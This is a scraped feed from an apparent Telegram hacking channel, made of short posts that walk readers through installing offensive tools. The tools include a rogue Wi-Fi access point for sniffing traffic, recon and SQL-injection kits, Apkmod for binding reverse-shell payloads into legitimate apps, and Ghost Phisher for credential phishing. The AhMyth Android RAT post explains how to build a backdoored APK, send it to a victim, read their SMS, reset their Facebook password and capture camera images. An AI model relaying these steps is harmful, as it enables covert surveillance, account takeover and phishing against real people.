UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘How to create a fake AP and sniff data.
t.me/UndercOdeTestingOfficial
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/xdavidhu/mitmAP

2) cd mitmAP

3) python mitmAP.py

๐Ÿฆ‘How it Works:

1) SSLstrip2 for HSTS bypass

2) Image capture with Driftnet

3) TShark for command line .pcap capture

๐Ÿฆ‘Features:

> SSLstrip2

> Driftnet

> Tshark

> Full featured access point, with configurable speed limit

> mitmproxy

> Wireshark

> DNS Spoofing

> Saving results to file
@ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘A security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
instagram.com/UndercOdeTestingCompany
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/codingo/Reconnoitre.git

> After you have done this run setup.py with the following:

2) python3 setup.py install

3) After setup has run Reconnoitre will now be in your path (as reconnoitre) and you can launch it anywhere using:

reconnoitre <args>

๐Ÿฆ‘Commands:

Argument Description
-h, --help Display help message and exit
-t TARGET_HOSTS Set either a target range of addresses or a single host to target. May also be a file containing hosts.
-o OUTPUT_DIRECTORY Set the target directory where results should be written.
-w WORDLIST Optionally specify your own wordlist to use for pre-compiled commands, or executed attacks.
--pingsweep Write a new target.txt file in the OUTPUT_DIRECTORY by performing a ping sweep and discovering live hosts.
--dns, --dnssweep Find DNS servers from the list of target(s).
--snmp Find hosts responding to SNMP requests from the list of target(s).
--services Perform a service scan over the target(s) and write recommendations for further commands to execute.
--hostnames Attempt to discover target hostnames and write to hostnames.txt.
--virtualhosts Attempt to discover virtual hosts using the specified wordlist. This can be expended via discovered hostnames.
--ignore-http-codes Comma separated list of http codes to ignore with virtual host scans.
--ignore-content-length Ignore content lengths of specificed amount. This may become useful when a server returns a static page on every virtual host guess.
--quiet Supress banner and headers and limit feedback to grepable results.
--quick Move to the next target after performing a quick scan and writing first-round recommendations.
--no-udp Disable UDP service scanning, which is ON by default.

@ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
๐Ÿฆ‘2019 tool that discovers valid subdomains for websites.

> Designed as a passive framework to be useful for bug bounties and safe for penetration testing.
instagram.com/UnderCodeTestingCompany
๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:
1) git clone https://github.com/projectdiscovery/subfinder/releases/

2) Download .tar

3) tar -xzvf subfinder-linux-amd64.tar

4) mv subfinder-linux-amd64 /usr/bin/subfinder

5)subfinder

๐Ÿฆ‘If you want to build it yourself, you can go get the repo

> go get -v github.com/projectdiscovery/subfinder/cmd/subfinder

> If you wish to upgrade the package you can use:

> go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder


๐Ÿฆ‘Running:

1) If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:

2) mkdir $HOME/.config/subfinder

3) cp config.yaml $HOME/.config/subfinder/config.yaml

4) nano $HOME/.config/subfinder/config.yaml

5) docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com

๐Ÿฆ‘How To Use:

1) Running Subfinder

To run the tool on a target, just use the following command.

2) subfinder -d freelancer.com

This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.

[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com

The -o command can be used to specify an output file.

> subfinder -d freelancer.com -o output.txt

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Termux exploite databse /see bugs in server + auto nmap and much more via simple automate script
twitter.com/UnderCodeTC

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/kuburan/txtool

2) cd txtool

3) apt install python2

4) ./install.py

5) txtool

6) for ssh backdoor access, txtool used paramiko python library that required PyNacl if you have an error installing PyNacl, follow my steps:

> apt-get install --assume-yes libsodium libsodium-dev

> SODIUM_INSTALL=system pip2 install pynacl

E N J O Y

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Generate combos based on Keywords with Termux
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) apt update&&apt upgrade -y

2) termux-setup-storage

3) pkg install php git -y

4) git clone https://github.com/Juni0r007/PasTerm.git

5) cd PasTerm

6) Ejecutamos el archivo *.php

7) chmod +x pasterm.php;

chmod +x pasterm.class.php

8) php pasterm.php

๐Ÿฆ‘Vid Tutorial:

> https://www.youtube.com/watch?v=0k9D20r2Q3U

Thats All
@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘How Install Java Jdk on Termux for many requirements and usefull!& without root
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1)pkg update

2) pkg upgrade

3) pkg install wget

4) wget https://raw.githubusercontent.com/MasterDevX/java/master/installjava

5) bash installjava

6) Now sucessfull installed jdk termux
@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘fsstat displays the details associated with a file system. The output of this command is file system specific. At a minimum, the range of meta-data values (inode numbers) and content units (blocks or clusters) are given. Also given are details from the Super Block, such as mount times and and features. For file systems that use groups (FFS and EXT2FS), the layout of each group is listed.

>For a FAT file system, the FAT table is displayed in a condensed format. Note that the data is in sectors and not in clusters.
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) Its kali pre-installed tool

2) To Run

> fsstat [-f fstype ] [-i imgtype] [-o imgoffset] [-b dev_sector_size] [-tvV] image [images]


๐Ÿฆ‘Commands :
-t type
Print the file system type only.
-f fstype
Specify the file system type. Use โ€™-f listโ€™ to list the supported file system types. If not given, autodetection methods are used.
-i imgtype
Identify the type of image file, such as raw. Use โ€™-i listโ€™ to list the supported types. If not given, autodetection methods are used.
-o imgoffset
The sector offset where the file system starts in the image.
-b dev_sector_size
The size, in bytes, of the underlying device sectors. If not given, the value in the image format is used (if it exists) or 512-bytes is assumed.
-v
Verbose output of debugging statements to stderr
-V
Display version

Written By Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘A Simple Termux(root) /Kali/parrot tools To scan port , Brute force protocol Service ,scan website , exploit system , exploit sql injection website and also have other characteristics
Twitter.com/UnderCodeTC

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/joker25000/DZGEN

2) The installation the tool

3) cd DZGEN

4) chmod +x DZGEN

5) ./DZGEN

6) Run DZGEN tool in terminal

> DZGEN

๐Ÿฆ‘Tested By UnderCode

> kali

> debian

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Git Best Tools Hacking For Kali Linux 2018
t.me/iOSDeveloppers


๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/Ha3MrX/GitTool

2) cd GitTool

3) chmod +x gittool.sh

4) ./gittool.sh

๐Ÿฆ‘Vid Tutorial

> https://www.youtube.com/watch?v=APkZOXJ2rnk

๐Ÿฆ‘Features:

See screanshaot below iam sure you will like this tool

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Understand before attack how it works

> How do hackers or remote attackers obtain the WPA or WPA2 Handshake from a wireless access point easily?
instagram.com/UnderCodeTestingCompany


๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Communication Negotiation

When the connection is first established between two modems, the negotiation of communication restrictions and boundaries occurs for a brief period of time. Afterwards, the infamous "squealing" noise that people hear from old, dial-up modems sporting speaker outputs (it's a sound that modifies its pitch a hundred times every second) once the connection has been successfully made is the aural manifestation of two modems engaging in the handshake process. Thereafter, once everything has been agreed upon in regards to parameters, they're (the parameters) are used to offer streamlined information transmission over the channel as a function of its capacity and quality.

๐Ÿฆ‘Free High Quality WiFi

Although handshakes are more often than not what hackers need to capture in order to gain unauthorized access to systems and networksโ€”or at the very least, get free, high-quality WiFi superior to those found in coffee shops and librariesโ€”it's a necessary and unavoidable step to ensuring smooth connections from two otherwise different and normally mismatched systems. In turn, a Wired Protected Access or WPA handshake to keep intruders or unauthorized users from accessing the network (e.g., a four-way Temporal Key Integrity Protocol or TKIP handshake, with TKIP referring to one of many encryption algorithms that WPA supports).

๐Ÿฆ‘WPA Handshake Exploit

As for using WPA handshakes as exploits for security breaches, there are a variety of methods suited for this hacking task. Any hacker who wants to capture a four-way TKIP handshake without any help will probably have to observe Internet traffic for hours-on-end, patiently stalking for a client to link to a network. As easier way to capture handshakes for hacking purposes involves the use of a hacking tool called Aircrack-ng and forced deauthentication of a connected client PC in order to make him reconnect back up to the server exactly when you want him to connect.

๐Ÿฆ‘Authentication Capture

Ironically enough, it's during the procedure wherein the encrypted WPA key is re-exchanged that a connection is most vulnerable for hacker attackโ€”the very process needed to protect a network can open it up to attack, like barging into a house while someone is in the middle of bolting the locks on his doors. Once the full authentication handshake has been captured from the client and an access point, the hacker can easily decrypt the information behind the handshake, thus allowing him the key to access the previously impenetrable network.


@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ANY PAGES FOR CREATE VIRTUAL NUMBERS๐Ÿฆ‘
t.me/UnderCodeTestingOfficial

To receive your messages of confirmation!

โฉโฉ1. Receivefreesms.net
2. Sms-receive.net
3. Receive-a-sms.comโฉ
4. โฆHs3x.comโฉ
5. Receive-sms-now.com - (There are Russian numbers)
6. Smsreceivefree.com
7. Receivesmsonline.com
8. Getsms.org - (ะ ัƒั.ะฝะพะผะตั€ะฐ)
9. Tempsms.ru - (Rus.number)
10. Numberforsms.com - (There are Russian numberps)
11. Sonetel.com
12. Smska.us - (Rus.number)
13. Sellaite.com
14. Sms.ink - (Rus.numera)
15. Proovl.com
16. Onlinesim.ru
17. Zadarma.com - (There are Russian numbers)
18. Smsc.ru - (You need to register, there are Russian and Ukrainian numbers)
19. Freevirtualnumber.skycallbd.com
20. Getfreesmsnumber.com
21. Receive-smsonline.net - Yearly design 
22. Receivefreesms.com
23. Receivesmsverification.com
24. Sms-online.co
25. Ireceivesmsonline.com
26. Receive-sms-online.com - (There are a number of scores)
27. Receive-sms-free.com
28. Esendex.com.au - (Registration required)
29. Receivesmsonline.in
๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘๐Ÿฆ‘
@kadrino (og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -

๐Ÿฆ‘HACK ANDROID REMONTLY/MONITOR + SMS EASY Steps... (EXPLOITE)BY UnderCode For medium experiences hacker on kali/ Wndows/termux...
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘Installisation & Run:

1) Download & Install AhMyth via 2 popular ways

A- using directly use the source code from GitHub

B- use the binaries they provide

๐Ÿฆ‘ SO LET S START: WITH METHODE 1 (A)

1) If you chose to start with the source code, then you'll need to check that you have a few prerequisites installed.

> Java โ€” it's used to generate the APK backdoor.

> Electron โ€” it's used to start the desktop application.
(https://github.com/electron/electron)

> Electron-builder and Electron-packer โ€” they are used to build the binaries for macOS, Windows, and Linux.
(https://github.com/electron-userland/electron-builder)

2) After instlling Those requestsOpen Terminal & Type:

> git clone https://github.com/AhMyth/AhMyth-Android-RAT.git

3) cd AhMyth-Android-RAT/AhMyth-Server

4) > npm start

5) This program is still in beta development, and as such, it isn't as robust as it could be. Some users have gotten errors when attempting to start it. If you do, try again running it as root, as seen below.

> sudo npm start --unsafe-perm

๐Ÿฆ‘IF USING METHODE B (From Binaries):

1) The source code is one way to download it, but if you're lazy like me, there's a slightly easier way โ€” use the binaries

2) Download or clone

> https://github.com/AhMyth/AhMyth-Android-RAT/releases

THEY HAVE FOR WINDOWS & LINUX

3) After installing :

> Build an APK

Now that we have the program up and running, it's time to build an Android application with a backdoor: ยซ just click on "Build."ยป

> At the top of the screen, select "APK Builder." The first thing to change is "Source IP." This needs to be the IP address of the computer you'll be sending and receiving commands from.

4) NOW navigate to to "C:\Users\UserName\AhMyth\Output" to find the built APK.

5) Now that you have a working APK, it's time to deploy it by downloading it on the target Android device( sending to victime)

6) For Auto install (same network adress)

If the Android phone doesn't want to install it, they probably never enabled "Unknown sources" in their settings. Open up the Settings, then go to "Security" and check "Unknown sources." This is how apps that come from outside the Google Play Store can be installed.

7) WELL DONE GET THEIR SMS EXAMPLE

If you really like to sow chaos, then you'll love this next feature: the ability to not only read but also send "SMS" messages. A simple way to use this would be to hack someone's Facebook by resetting their password with an SMS text, then use the code that is sent

8) DON T MIND WE CAN ALSO GET CAMERA IMAGES....

๐Ÿฆ‘TESTED BY undercOde on

> Win

> DEBIAN

wฬฝอ“rฬฝอ“iฬฝอ“tฬฝอ“tฬฝอ“eฬฝอ“nฬฝอ“ ฬฝอ“bฬฝอ“yฬฝอ“ ฬฝอ“Mฬฝอ“rฬฝอ“.ฬฝอ“ ฬฝอ“Bฬฝอ“oฬฝอ“tฬฝอ“Nฬฝอ“eฬฝอ“tฬฝอ“ ฬฝอ“(ฬฝอ“tฬฝอ“.ฬฝอ“mฬฝอ“.ฬฝอ“)ฬฝอ“

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Topic termux/kali onex is a hacking tool installer and package manager for hackers. Onex is a library of all hacking tools for Turmex and other Linux distributions. onex can install any third party tool or any hacking tool for you.
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) apt update

2) apt install git

3) git clone https://github.com/Rajkumrdusad/onex.git

4) chmod +x onex/install

5) sh onex/install if not work than use ./onex/install

6) onex -h or onex help for help.

๐Ÿฆ‘Options :

> onex install [tool_name] install any tool.

> onex -i [tool_name] install any tool.

> onex search [tool_name] search any tool.

> onex -s [tool_name] search any tool.

> onex list list all tools.

> onex list -a list all tools.

> onex -l list all tools.

> onex -l -a list all tools.

> onex help get help.

> onex -h get help.

type

> onex star: to start onex menu mode.

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Apkmod can decompile, recompile, sign APK, and bind the payload with any legit APP
t.me/iOsDeveloppers

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

> Termux

1) cd $HOME

2) wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

3) Execute the script sh setup.sh

4) For decompiling apkmod -d /path/to/inapp.apk -o /path/to/outdirectory. It will decompile inapp.apk into outdirectory folder.

5) For recompiling apkmod -r /path/to/indirectory -o /path/to/outapp.apk. It will recompile indirectory ( where decompiled files are exists ) into outapp.apk.

6) For signing apkmod -s /path/to/unsignedapp.apk -o /path/to/signedapp.apk. It will sign unsignedapp.apk and saves output ( signed app ) to signedapp.apk.

7) For binding apkmod -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444. It will bind payload with originalApp.apk and saves final binded app to binded.apk.

8) Now you can use a optional option -a to use aapt2 for binding and recompiling. Why aapt2 ? Because some apps can't recompile with aapt but aapt2 can do it. But I can't drop aapt support because some apps can't recompile with aapt2 so first recompile or bind without aapt2 ( -a ) then if you failed then try with aapt2. For example apkmod -a -b /path/to/originalApp.apk -o /path/to/binded.apk LHOST=127.0.0.1 LPORT=4444.

9) Now payload Sucess

E N J O Y

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Make your net speed more faster via termux:
bash script ( no exception handling ) to update no-ip DNS to avoid 30 day expiration
facebook.com/UnderCodeTestingCompanie

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/hax4us/no-ip-updater.git

2) cd no-ip-updater

3) bash setup

4) it will ask for your email id (which was registered in no-ip) , password and your Hostname like demo.ddns.net

5) Now noipupdater will update the hostname with your public IP

Thats all ;)
@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘best Phishing tool in world
Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks.
Automatically exported from code .google .com/ p/ghost-phisher
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/savio-code/ghost-phisher

2) cd ghost-phisher

3) again cd ghost-phisher

4) run as python after comple requests
python ghost.py

5) for kali or any debian forkes
> root@host:~# dpkg -i ghost-phisher_1.5_all.deb

๐Ÿฆ‘Requirements:

1. Aircrack-NG

2. Python-Scapy

3. Python Qt4

4. Python

5. Subversion

6. Xterm

7. Metasploit Framework (Optional)

๐Ÿฆ‘Features:

Ghost Phisher currently supports the following features:

1. HTTP Server

2. Inbuilt RFC 1035 DNS Server

3. Inbuilt RFC 2131 DHCP Server

4. Webpage Hosting and Credential Logger (Phishing)

5. Wifi Access point Emulator

6. Session Hijacking (Passive and Ethernet Modes)

7. ARP Cache Poisoning (MITM and DOS Attacks)

8. Penetration using Metasploit Bindings

9. Automatic credential logging using SQlite Database

10. Update Support

๐Ÿฆ‘Use For learn not For Harm!!!!!!๐Ÿฆ‘

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(og)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–